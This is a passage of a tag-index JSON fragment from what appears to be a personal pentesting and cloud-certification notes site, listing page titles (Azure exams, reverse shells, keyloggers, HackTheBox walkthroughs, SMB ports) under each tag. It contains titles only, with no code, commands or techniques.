                        ","tags":["tags"]},{"location":"tags/#az-900","title":"az-900","text":"
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#azure_1","title":"azure","text":"
                        • Azure-CLI
                        • Azure Powershell
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#azure-cli","title":"azure-cli","text":"
                        • Azure-CLI
                        ","tags":["tags"]},{"location":"tags/#backdoors","title":"backdoors","text":"
                        • Evading detection in file transfers
                        • Transferring files with code
                        • Transferring files techniques - Linux
                        • Transferring files techniques - Windows
                        ","tags":["tags"]},{"location":"tags/#bash","title":"bash","text":"
                        • Packet manager
                        • Azure-CLI
                        • bash - Bourne Again Shell
                        • curl
                        • unshadow
                        • vnstat - Monitoring network impact
                        ","tags":["tags"]},{"location":"tags/#basic-digest","title":"basic digest","text":"
                        • HTTP Authentication Schemes
                        ","tags":["tags"]},{"location":"tags/#bcm","title":"bcm","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        ","tags":["tags"]},{"location":"tags/#binaries","title":"binaries","text":"
                        • LOLbins - Living off the land binaries - LOLbas and GTFObins
                        ","tags":["tags"]},{"location":"tags/#bind-shells","title":"bind shells","text":"
                        • Bind Shells
                        ","tags":["tags"]},{"location":"tags/#binscope","title":"binscope","text":"
                        • Common vulnerabilities
                        ","tags":["tags"]},{"location":"tags/#browsers","title":"browsers","text":"
                        • Pentesting browsers
                        • Man in the browser attack
                        ","tags":["tags"]},{"location":"tags/#brute-force","title":"brute force","text":"
                        • John the Ripper - A hash cracker and dictionary attack tool
                        ","tags":["tags"]},{"location":"tags/#brute-forcing","title":"brute forcing","text":"
                        • hydra
                        • medusa
                        ","tags":["tags"]},{"location":"tags/#burpsuite","title":"burpsuite","text":"
                        • Burpsuite
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • BurpSuite Labs - Broken access control vulnerabilities
                        • BurpSuite Labs - Insecure deserialization
                        • BurpSuite Labs - Json Web Token jwt
                        • BurpSuite Labs
                        • BurpSuite Labs - SQL injection
                        • BurpSuite Labs - Server Side Request Forgery
                        • BurpSuite Labs - Server Side Template Injection
                        • BurpSuite Labs - Cross-site Scripting
                        • BurpSuite Labs - Json Web Token jwt
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#bypass-techniques","title":"bypass techniques","text":"
                        • Virtualbox and Extension Pack
                        ","tags":["tags"]},{"location":"tags/#bypassing-firewall","title":"bypassing firewall","text":"
                        • Bypassing Next Generation Firewalls
                        ","tags":["tags"]},{"location":"tags/#bypassing-techniques","title":"bypassing techniques","text":"
                        • Bypassing Next Generation Firewalls
                        • Hickjack the Internet Explorer process to bypass an host-based firewall
                        ","tags":["tags"]},{"location":"tags/#certification","title":"certification","text":"
                        • eWPT Preparation
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#cheat","title":"cheat","text":"
                        • Pentesting Powerapp
                        ","tags":["tags"]},{"location":"tags/#cheat-sheet","title":"cheat sheet","text":"
                        • msSQL - Microsoft SQL Server
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • sqsh
                        ","tags":["tags"]},{"location":"tags/#checklist","title":"checklist","text":"
                        • Thick client Applications Pentesting Checklist
                        ","tags":["tags"]},{"location":"tags/#checksum","title":"checksum","text":"
                        • Checksum
                        ","tags":["tags"]},{"location":"tags/#chrome","title":"chrome","text":"
                        • Pentesting browsers
                        ","tags":["tags"]},{"location":"tags/#cloud","title":"cloud","text":"
                        • AWS cli
                        • Azure-CLI
                        • Azure Powershell
                        • gcloud CLI
                        • Apache CloudStack Essentials
                        • Amazon Web Services (AWS) Essentials
                        • Pentesting Amazon Web Services (AWS)
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • Exams - Practice the AZ-500
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • Exams - Practice the AZ-900
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        • Pentesting Azure
                        • Pentesting docker
                        • Google Cloud Platform Essentials
                        • Openstack Essentials
                        ","tags":["tags"]},{"location":"tags/#cloud-pentesting","title":"cloud pentesting","text":"
                        • Pentesting cloud
                        ","tags":["tags"]},{"location":"tags/#cms_1","title":"cms","text":"
                        • moodlescan
                        ","tags":["tags"]},{"location":"tags/#connection-problems","title":"connection problems","text":"
                        • How to resolve run of the mill connection problems
                        ","tags":["tags"]},{"location":"tags/#containers","title":"containers","text":"
                        • Pentesting docker
                        ","tags":["tags"]},{"location":"tags/#course","title":"course","text":"
                        • eWPT Preparation
                        • AZ-104 Microsoft Azure Administrator certificate
                        • AZ-500 Microsoft Azure Active Directory- Manage Identity and Access
                        • AZ-500 Microsoft Azure Active Directory- Platform protection
                        • AZ-500 Microsoft Azure Active Directory- Data and applications
                        • AZ-500 Microsoft Azure Active Directory- Security operations
                        • AZ-500 Microsoft Azure Security Technologies Certificate - keep learning
                        • AZ-500 Microsoft Azure Security Technologies Certificate
                        • AZ-900 Notes to get through the Azure Fundamentals Certificate
                        ","tags":["tags"]},{"location":"tags/#cpts_1","title":"cpts","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        • Rules of Engagement - Checklist
                        ","tags":["tags"]},{"location":"tags/#cracking-tool","title":"cracking tool","text":"
                        • Hashcat - A password recovery tool
                        ","tags":["tags"]},{"location":"tags/#crytography","title":"crytography","text":"
                        • cryptography
                        ","tags":["tags"]},{"location":"tags/#cvss","title":"cvss","text":"
                        • CVSS Common Vulnerability Scoring System
                        • Microsoft DREAD
                        ","tags":["tags"]},{"location":"tags/#cybersecurity","title":"cybersecurity","text":"
                        • Welcome to Hacking Life!
                        ","tags":["tags"]},{"location":"tags/#database","title":"database","text":"
                        • MariaDB
                        • Mongo
                        • Mongo
                        • msSQL - Microsoft SQL Server
                        • MySQL
                        • Pentesting Powerapp
                        • sqlite
                        • sqlite
                        • sqsh
                        • Virtual environments
                        • Virtual environments
                        ","tags":["tags"]},{"location":"tags/#ddns","title":"ddns","text":"
                        • Coding a DDNS aware shell
                        ","tags":["tags"]},{"location":"tags/#deserialization","title":"deserialization","text":"
                        • Phpggc - A tool for PHP deserialization
                        • Ysoserial - A tool for Java deserialization
                        • BurpSuite Labs - Insecure deserialization
                        ","tags":["tags"]},{"location":"tags/#dictionaries","title":"dictionaries","text":"
                        • cewl - A custom dictionary generator
                        • crunch - A dictionary generator
                        ","tags":["tags"]},{"location":"tags/#dictionary","title":"dictionary","text":"
                        • CUPP - Common User Password Profiler
                        • Dictionaries or wordlists resources
                        • Creating malware and custom payloads
                        ","tags":["tags"]},{"location":"tags/#dictionary-attack","title":"dictionary attack","text":"
                        • John the Ripper - A hash cracker and dictionary attack tool
                        ","tags":["tags"]},{"location":"tags/#dictionary-generator","title":"dictionary generator","text":"
                        • CUPP - Common User Password Profiler
                        ","tags":["tags"]},{"location":"tags/#directory","title":"directory","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#directory-enumeration","title":"directory enumeration","text":"
                        • dirb - A web content enumeration tool
                        ","tags":["tags"]},{"location":"tags/#django","title":"django","text":"
                        • django pentesting
                        ","tags":["tags"]},{"location":"tags/#dll-hickjacking","title":"dll hickjacking","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#dns","title":"dns","text":"
                        • dig axfr
                        • dnsenum - A tool to enumerate DNS
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • How to resolve run of the mill connection problems
                        • nslookup
                        ","tags":["tags"]},{"location":"tags/#dns-enumeration","title":"dns enumeration","text":"
                        • Amass
                        ","tags":["tags"]},{"location":"tags/#dnspy","title":"dnspy","text":"
                        • Attacking thick clients applications - Data storage issues
                        • First challenge - Enabling a button - Thick client Applications
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#docker","title":"docker","text":"
                        • docker
                        • Pentesting docker
                        ","tags":["tags"]},{"location":"tags/#domain","title":"domain","text":"
                        • Port 53 - Domain Name Server (DNS)
                        • ctr.sh
                        • dnscan - A DNS subdomain scanner
                        ","tags":["tags"]},{"location":"tags/#dorking","title":"dorking","text":"
                        • Github dorks
                        • Google dorks
                        ","tags":["tags"]},{"location":"tags/#dorkings","title":"dorkings","text":"
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#dotpeek","title":"dotpeek","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#dovecot","title":"dovecot","text":"
                        • 55006-55007 Dovecot pop3
                        ","tags":["tags"]},{"location":"tags/#dread","title":"dread","text":"
                        • Microsoft DREAD
                        ","tags":["tags"]},{"location":"tags/#dump-hashes","title":"dump hashes","text":"
                        • CrackMapExec
                        • Invoke-TheHash
                        • mimikatz
                        • pypykatz
                        ","tags":["tags"]},{"location":"tags/#ewpt","title":"eWPT","text":"
                        • 01. Information Gathering / Footprinting
                        • Pentesting Notes
                        ","tags":["tags"]},{"location":"tags/#echo-mirage","title":"echo mirage","text":"
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#encryption","title":"encryption","text":"
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        ","tags":["tags"]},{"location":"tags/#engagement","title":"engagement","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        ","tags":["tags"]},{"location":"tags/#enumeration","title":"enumeration","text":"
                        • The ActiveDirectory PowerShell module
                        • Amass
                        • Aquatone - Automatize web scanner in large subdomain lists
                        • BloodHound
                        • braa - SNMP scanner
                        • cewl - A custom dictionary generator
                        • crunch - A dictionary generator
                        • CUPP - Common User Password Profiler
                        • dig axfr
                        • dnsenum - A tool to enumerate DNS
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • enum
                        • enum4linux
                        • EyeWitness
                        • ffuf - A fast web fuzzer written in Go
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • Hashcat - A password recovery tool
                        • Bank - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        • httprint - A web server fingerprinting tool
                        • JAWS - Just Another Windows (Enum) Script
                        • John the Ripper - A hash cracker and dictionary attack tool
                        • knockpy - A subdomain scanner
                        • LinEnum - A tool to scan Linux system
                        • nslookup
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • Seatbelt - A tool to scan Windows system
                        • SharpView
                        • snmpwalk - SNMP scanner
                        • WafW00f - A firewall scanner
                        • Weevely - A PHP webshell backdoor generator
                        • whatweb - A web scanner
                        • wpscan - Wordpress Security Scanner
                        ","tags":["tags"]},{"location":"tags/#evading-detection","title":"evading detection","text":"
                        • Evading detection in file transfers
                        ","tags":["tags"]},{"location":"tags/#exploitation","title":"exploitation","text":"
                        • searchsploit
                        • Evading detection in file transfers
                        • Transferring files with code
                        • Transferring files techniques - Linux
                        • Transferring files techniques - Windows
                        • OWASP Web Security Testing Guide
                        • Web Exploitation Guide
                        ","tags":["tags"]},{"location":"tags/#file","title":"file","text":"
                        • exiftool - A tool for metadata edition
                        ","tags":["tags"]},{"location":"tags/#file-integrity","title":"file integrity","text":"
                        • Checksum
                        ","tags":["tags"]},{"location":"tags/#file-transfer","title":"file transfer","text":"
                        • Setting up servers
                        ","tags":["tags"]},{"location":"tags/#file-transfer-technique","title":"file transfer technique","text":"
                        • Evading detection in file transfers
                        • Transferring files with code
                        • Transferring files techniques - Linux
                        • Transferring files techniques - Windows
                        • uploadserver
                        ","tags":["tags"]},{"location":"tags/#file-upload","title":"file upload","text":"
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#fingerprinting","title":"fingerprinting","text":"
                        • httprint - A web server fingerprinting tool
                        ","tags":["tags"]},{"location":"tags/#firefox","title":"firefox","text":"
                        • Pentesting browsers
                        • Man in the browser attack
                        ","tags":["tags"]},{"location":"tags/#firewall","title":"firewall","text":"
                        • Bypassing Next Generation Firewalls
                        ","tags":["tags"]},{"location":"tags/#footprinting","title":"footprinting","text":"
                        • 01. Information Gathering / Footprinting
                        ","tags":["tags"]},{"location":"tags/#forensic","title":"forensic","text":"
                        • Computer Forensic Fundamentals
                        ","tags":["tags"]},{"location":"tags/#ftp","title":"ftp","text":"
                        • 21 ftp
                        • Walkthrough - A HackTheBox machine - Funnel
                        ","tags":["tags"]},{"location":"tags/#ftp-server","title":"ftp server","text":"
                        • pyftpdlib - A ftp server written in python
                        ","tags":["tags"]},{"location":"tags/#gcp","title":"gcp","text":"
                        • gcloud CLI
                        • Google Cloud Platform Essentials
                        ","tags":["tags"]},{"location":"tags/#google-cloud-platform","title":"google cloud platform","text":"
                        • gcloud CLI
                        • Google Cloud Platform Essentials
                        ","tags":["tags"]},{"location":"tags/#headers","title":"headers","text":"
                        • CSRF attack - Cross Site Request Forgery
                        ","tags":["tags"]},{"location":"tags/#host-based-firewall","title":"host based firewall","text":"
                        • Hickjack the Internet Explorer process to bypass an host-based firewall
                        ","tags":["tags"]},{"location":"tags/#http_1","title":"http","text":"
                        • netcat
                        ","tags":["tags"]},{"location":"tags/#idasm","title":"idasm","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#ilasm","title":"ilasm","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#ilspy","title":"ilspy","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#imap","title":"imap","text":"
                        • Ports 110,143,993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#impacket","title":"impacket","text":"
                        • 1433 msSQL
                        • smbserver - from impacket
                        ","tags":["tags"]},{"location":"tags/#information-gathering","title":"information gathering","text":"
                        • Information gathering
                        ","tags":["tags"]},{"location":"tags/#information-gathering_1","title":"information-gathering","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        • Rules of Engagement - Checklist
                        ","tags":["tags"]},{"location":"tags/#intelligent-platform-management-interface","title":"intelligent platform management interface","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        ","tags":["tags"]},{"location":"tags/#ipmi","title":"ipmi","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        • IPMItool
                        ","tags":["tags"]},{"location":"tags/#ips","title":"ips","text":"
                        • Bypassing IPS with handmade XOR Encryption
                        ","tags":["tags"]},{"location":"tags/#java","title":"java","text":"
                        • Log4j
                        • Ysoserial - A tool for Java deserialization
                        ","tags":["tags"]},{"location":"tags/#java-rmi","title":"java rmi","text":"
                        • 1090 java rmi
                        ","tags":["tags"]},{"location":"tags/#jboss","title":"jboss","text":"
                        • 8080 JBoss AS Instance 6.1.0
                        ","tags":["tags"]},{"location":"tags/#jndi","title":"jndi","text":"
                        • Walkthrough - Unified - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#jwt","title":"jwt","text":"
                        • BurpSuite Labs - Json Web Token jwt
                        • BurpSuite Labs - Json Web Token jwt
                        • Json Web Token attacks
                        ","tags":["tags"]},{"location":"tags/#keycloak","title":"keycloak","text":"
                        • Pentesting Keycloak
                        ","tags":["tags"]},{"location":"tags/#keylogger","title":"keylogger","text":"
                        • Dumping saved passwords from Google Chrome
                        • Hijacking Keepass Password Manager
                        • Simple keylogger in python
                        ","tags":["tags"]},{"location":"tags/#labs","title":"labs","text":"
                        • Basic Lab Setup - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#language","title":"language","text":"
                        • Markdown
                        ","tags":["tags"]},{"location":"tags/#ldap","title":"ldap","text":"
                        • Port 389 - 636 LDAP
                        • Active Directory - LDAP
                        • The ActiveDirectory PowerShell module
                        • BloodHound
                        • Microsoft Management Console (MMC)
                        • NT Authority System
                        • PowerUp.ps1
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • SharpView
                        ","tags":["tags"]},{"location":"tags/#linux","title":"linux","text":"
                        • Arp poisoning
                        • Configuration files
                        • Cron jobs - path, wildcards, file overwrite.
                        • Dirty COW (Copy On Write)
                        • Kernel vulnerability exploitation
                        • Linux credentials storage
                        • lxd
                        • postfix - A SMTP server
                        • Process capabilities - getcap
                        • SSH keys
                        • Suid Binaries
                        • Transferring files techniques - Linux
                        ","tags":["tags"]},{"location":"tags/#linux-pentesting","title":"linux pentesting","text":"
                        • LinEnum - A tool to scan Linux system
                        • linPEAS - A tool to scan Linux system
                        • Linux Privilege Checker
                        ","tags":["tags"]},{"location":"tags/#linux-privilege-escalation","title":"linux privilege escalation","text":"
                        • Base - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#local-file-inclusion","title":"local file inclusion","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#log4j","title":"log4j","text":"
                        • Walkthrough - Unified - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#lxd","title":"lxd","text":"
                        • lxd
                        ","tags":["tags"]},{"location":"tags/#lxd-exploitation","title":"lxd exploitation","text":"
                        • Walkthrough - Included - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#mariadb","title":"mariadb","text":"
                        • 3306 mariadb mysql
                        • Sequel - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#metasploit","title":"metasploit","text":"
                        • Lame - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#microsoft","title":"microsoft","text":"
                        • Exams - Practice the AZ-500
                        • Exams - Practice the AZ-900
                        ","tags":["tags"]},{"location":"tags/#mimikatz","title":"mimikatz","text":"
                        • 3389 RDP
                        ","tags":["tags"]},{"location":"tags/#mitm-relay","title":"mitm relay","text":"
                        • Traffic analysis - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#mobile-pentesting","title":"mobile pentesting","text":"
                        • Android Debug Bridge - ADB
                        • apktool
                        • drozer - A security testing framework for Android
                        • Frida - A dynamic instrumentation toolkit
                        • Mobile Security Framework - MobSF
                        • Objection
                        • scrcpy
                        • Setting up the mobile pentesting environment
                        ","tags":["tags"]},{"location":"tags/#mongodb","title":"mongodb","text":"
                        • 27017-27018 mongodb
                        • Walkthough - A HackTheBox machine - Mongod
                        • Walkthrough - Unified - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#moodle","title":"moodle","text":"
                        • moodlescan
                        ","tags":["tags"]},{"location":"tags/#mssql","title":"mssql","text":"
                        • 1433 msSQL
                        • sqsh
                        ","tags":["tags"]},{"location":"tags/#mysql","title":"mysql","text":"
                        • 3306 mariadb mysql
                        ","tags":["tags"]},{"location":"tags/#nessus","title":"nessus","text":"
                        • Vulnerability assessment
                        ","tags":["tags"]},{"location":"tags/#network","title":"network","text":"
                        • Network traffic capture tools
                        • vnstat - Monitoring network impact
                        ","tags":["tags"]},{"location":"tags/#network-services","title":"network services","text":"
                        • Well-known ports
                        ","tags":["tags"]},{"location":"tags/#next-generation-firewalls","title":"next generation firewalls","text":"
                        • Bypassing Next Generation Firewalls
                        ","tags":["tags"]},{"location":"tags/#nmap","title":"nmap","text":"
                        • xsltproc
                        ","tags":["tags"]},{"location":"tags/#odata","title":"oData","text":"
                        • Pentesting oDAta
                        ","tags":["tags"]},{"location":"tags/#of","title":"of","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        ","tags":["tags"]},{"location":"tags/#open-source","title":"open source","text":"
                        • Apache CloudStack Essentials
                        • Openstack Essentials
                        ","tags":["tags"]},{"location":"tags/#openssl","title":"openssl","text":"
                        • openSSL - Cryptography and SSL/TLS Toolkit
                        ","tags":["tags"]},{"location":"tags/#openvas","title":"openvas","text":"
                        • Vulnerability assessment
                        ","tags":["tags"]},{"location":"tags/#oracle-tns","title":"oracle tns","text":"
                        • 1521 - Oracle Transparent Network Substrate (TNS)
                        • sqlplus - To connect and manage the Oracle RDBMS
                        ","tags":["tags"]},{"location":"tags/#osint","title":"osint","text":"
                        • Github dorks
                        • Google dorks
                        ","tags":["tags"]},{"location":"tags/#package-manager","title":"package manager","text":"
                        • pip
                        ","tags":["tags"]},{"location":"tags/#pass-the-hash-attack","title":"pass the hash attack","text":"
                        • Invoke-TheHash
                        • mimikatz
                        ","tags":["tags"]},{"location":"tags/#pass-the-hash","title":"pass-the-hash","text":"
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#passive-reconnaissance","title":"passive reconnaissance","text":"
                        • p0f
                        ","tags":["tags"]},{"location":"tags/#passiverecon","title":"passiverecon","text":"
                        • HTTrack - A tool for mirrowing sites
                        • nmap - A network exploration and security auditing tool
                        • Powercat - An alternative to netcat coded in PowerShell
                        ","tags":["tags"]},{"location":"tags/#password-cracker","title":"password cracker","text":"
                        • ophcrack - A windows password cracker based on rainbow tables
                        ","tags":["tags"]},{"location":"tags/#passwords","title":"passwords","text":"
                        • CrackMapExec
                        • hydra
                        • Invoke-TheHash
                        • Lazagne
                        • medusa
                        • mimikatz
                        • pypykatz
                        ","tags":["tags"]},{"location":"tags/#payloads","title":"payloads","text":"
                        • darkarmour
                        • mythic
                        • nishang
                        • Creating malware and custom payloads
                        ","tags":["tags"]},{"location":"tags/#pentest","title":"pentest","text":"
                        • Information gathering
                        ","tags":["tags"]},{"location":"tags/#pentesting","title":"pentesting","text":"
                        • Welcome to Hacking Life!
                        • 22 ssh
                        • 3128 squid
                        • Port 53 - Domain Name Server (DNS)
                        • 69 - tftp
                        • Aquatone - Automatize web scanner in large subdomain lists
                        • Bind Shells
                        • Pentesting browsers
                        • Configuration files
                        • Cron jobs - path, wildcards, file overwrite.
                        • curl
                        • dig axfr
                        • dirb - A web content enumeration tool
                        • Dirty COW (Copy On Write)
                        • django pentesting
                        • dnscan - A DNS subdomain scanner
                        • dnsenum - A tool to enumerate DNS
                        • DNSpy - A .NET decompiler for windows
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • eJPT - eLearnSecurity Junior Penetration Tester
                        • exiftool - A tool for metadata edition
                        • EyeWitness
                        • feroxbuster - A web content enumeration tool for not referenced resources
                        • ffuf - A fast web fuzzer written in Go
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • Gopherus
                        • Gopherus
                        • grep
                        • Hashcat - A password recovery tool
                        • httprint - A web server fingerprinting tool
                        • hydra
                        • ntlmrelayx - a module from Impacket
                        • PsExec - a module from Impacket
                        • SMBExec - a module from Impacket
                        • Impacket - A python tool for network protocols
                        • IPMItool
                        • JAWS - Just Another Windows (Enum) Script
                        • John the Ripper - A hash cracker and dictionary attack tool
                        • Kernel vulnerability exploitation
                        • knockpy - A subdomain scanner
                        • Lateral movements
                        • Laudanum - Injectable Web Exploit Code
                        • Lazagne
                        • LinEnum - A tool to scan Linux system
                        • linPEAS - A tool to scan Linux system
                        • Linux exploit suggester
                        • Linux Privilege Checker
                        • LOLbins - Living off the land binaries - LOLbas and GTFObins
                        • M365 CLI
                        • medusa
                        • metasploit
                        • moodlescan
                        • msfvenom
                        • Pentesting MyBB
                        • netcraft
                        • netdiscover - A network enumeration tool based on ARP request
                        • Network traffic capture tools
                        • noip
                        • nslookup
                        • Pentesting oDAta
                        • ophcrack - A windows password cracker based on rainbow tables
                        • Pentesting Notes
                        • pyftpdlib - A ftp server written in python
                        • pyinstaller
                        • Reverse Shells
                        • Reverse Shells
                        • Samba Suite
                        • searchsploit
                        • Seatbelt - A tool to scan Windows system
                        • Spawn a shell
                        • SQLi Cheat sheet for manual injection
                        • sqlmap - A tool for testing SQL injection
                        • SSH keys
                        • sslyze - A tool for scanning certificates
                        • sublist3r - A subdomain enumerating tool
                        • Suid Binaries
                        • tcpdump - A command-line packet analyzer
                        • The Harvester - A tool for pasive and active reconnaissance
                        • Tmux - A terminal multiplexer
                        • veil - A backdoor generator
                        • Vulnerability assessment
                        • Vulnhub Raven 1
                        • Vulnhub Raven 2
                        • w3af
                        • WafW00f - A firewall scanner
                        • waybackurls
                        • Pentesting web services
                        • Web Shells
                        • WebDav- WsgiDAV - A generic and extendable WebDAV server
                        • Weevely - A PHP webshell backdoor generator
                        • wfuzz
                        • whatweb - A web scanner
                        • Window Detective - A tool to view windows properties in the system
                        • Windows binaries - LOLBAS
                        • winspy - A tool to view windows properties in the system
                        • pentesting wordpress
                        • wpscan - Wordpress Security Scanner
                        • xsltproc
                        • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                        • OWASP Web Security Testing Guide
                        • OWASP Web Security Testing Guide
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        • Map Application architecture - OWASP Web Security Testing Guide
                        • Mifare Classic
                        • Mifare Desfire
                        • NFC - Setting up proxmark3 RDV4.01
                        • Proxmark3 RDV4.01
                        • Proxmark3 RDV4.01
                        • RFID
                        • Web Exploitation Guide
                        • Web Exploitation Guide
                        • Arbitrary file upload
                        • Arbitrary file upload
                        • CSRF attack - Cross Site Request Forgery
                        • Directory Traversal attack
                        • Insecure deserialization
                        • Json Web Token attacks
                        • LFI attack - Local File Inclusion
                        • NoSQL injection
                        • NoSQL injection
                        • RFD attack - Reflected File Download
                        • RCE attack - Remote Code Execution
                        • RFI attack - Remote File Inclusion
                        • SSRF attack - Server Side Request Forgery
                        • Server-side Template Injection - SSTI
                        • Session Puzzling - Session Variable Overloading
                        • SQL injection
                        ","tags":["tags"]},{"location":"tags/#pentesting-http-headers","title":"pentesting HTTP headers","text":"
                        • HTTP headers
                        ","tags":["tags"]},{"location":"tags/#pentesting-cloud","title":"pentesting cloud","text":"
                        • Pentesting Amazon Web Services (AWS)
                        • Pentesting Azure
                        ","tags":["tags"]},{"location":"tags/#pentesting-windows","title":"pentesting windows","text":"
                        • SAMRDump
                        • smbserver - from impacket
                        • Windows Null session attack
                        • Winfo
                        ","tags":["tags"]},{"location":"tags/#pentestingc","title":"pentesting\u00e7","text":"
                        • Weevely - A PHP webshell backdoor generator
                        ","tags":["tags"]},{"location":"tags/#persistence","title":"persistence","text":"
                        • Making your binary persistent
                        ","tags":["tags"]},{"location":"tags/#phishing","title":"phishing","text":"
                        • BeEF - The browser exploitation framework project
                        • Tools for cloning a site
                        ","tags":["tags"]},{"location":"tags/#php","title":"php","text":"
                        • pentesmonkey php reverse shell
                        • Phpggc - A tool for PHP deserialization
                        • WhiteWinterWolf php webshell
                        ","tags":["tags"]},{"location":"tags/#php-include","title":"php include","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#php-type-juggling","title":"php type juggling","text":"
                        • Base - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#ping","title":"ping","text":"
                        • fping - An improved ping tool
                        • How to resolve run of the mill connection problems
                        ","tags":["tags"]},{"location":"tags/#pop3","title":"pop3","text":"
                        • Ports 110,143,993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port","title":"port","text":"
                        • Port 389 - 636 LDAP
                        ","tags":["tags"]},{"location":"tags/#port-1090","title":"port 1090","text":"
                        • 1090 java rmi
                        ","tags":["tags"]},{"location":"tags/#port-110","title":"port 110","text":"
                        • Ports 110,143,993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-111","title":"port 111","text":"
                        • Port 111, 32731 - rpc
                        • Port 2049 - NFS Network File System
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#port-137","title":"port 137","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-138","title":"port 138","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-139","title":"port 139","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
